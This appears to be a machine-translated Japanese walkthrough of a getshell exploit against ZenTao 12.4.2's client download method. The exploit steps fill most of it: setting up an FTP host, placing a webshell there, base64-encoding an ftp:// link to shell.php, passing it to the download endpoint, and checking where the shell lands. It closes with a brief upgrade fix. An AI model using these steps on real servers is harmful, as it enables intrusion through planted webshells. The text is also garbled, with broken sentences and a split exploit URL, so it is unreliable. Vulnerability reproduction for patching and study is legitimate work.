ZenTao は、製品管理とプロジェクト管理、品質を統合するプロフェッショナルな国産オープンソース R&D プロジェクト管理ソフトウェアです。管理、文書管理、組織管理、取引管理など、研究開発プロジェクト管理の中核プロセスを完全にカバーします。経営理念は、国際的に普及しているアジャイルプロジェクト管理手法「スクラム」に基づいており、その価値観を踏襲し、国内のプロジェクト研究開発の現状と合わせて、タスク管理、需要管理、バグ管理などの複数の機能を統合しています。 、ユースケース管理など、ソフトウェアの計画からリリースのライフサイクル全体をカバーします。
ZenTao 12.4.2 バージョンには、クライアント クラスのダウンロード メソッドのフィルタリングが緩いことが原因で、任意のファイルがダウンロードされる脆弱性があります。これは ftp を使用して実現できます ファイルをダウンロードする目的。そして、ダウンロードされたファイルの保存ディレクトリはphpファイルを解析し、getshellを引き起こす可能性があります。
ZenTao≤ 12.4.2
phpstudy2018 Zen Tao 12.4 .2 Zen Tao 公式ダウンロードアドレス:
https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html
3.1. ダウンロードが完了したら、 phpstudy
#3 にインストールするだけです 3.2. 拡張機能を確認します 失敗する拡張機能がある場合は、phpstudy で拡張機能を開きます。
#3.3. データベース情報を設定し、ここで独自のデータベース構成に設定します。
#3.4. アカウントを設定するとインストールが完了します
#3.4.環境を使用して ftp サービスを設定し、有効にします。Windows2008R2 を例として、ロールを追加し、ftp
3.6. 独自の状況に応じて設定し、次のステップは
3.7. ftp ディレクトリに webshell を配置し、ブラウザで ftp に正常にアクセスできるか確認します。
1. まず、ftp のパスをシェルに追加し、base64 エンコードを実行します。
暗号化前: ftp://192.168.3.200/shell.php
暗号化後: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==
2. EXP を使用し、暗号化された Base64 を exp
http://127.0.0.1/zentaopms/www の に入れます。 /index.php /client-download-1-
#3.次のリンク パスを使用して、シェルがサーバーにダウンロードされたかどうかをテストします。
http://192.168.3.200/zentaopms/www/data/client/1/shell.php
1. ZenTao 12.4.3 以降のバージョンにアップグレードします
以上がZenTao 12.4.2 の Getshell のバックグラウンド管理者権限は何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
![[Web フロントエンド] Node.js クイック スタート](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
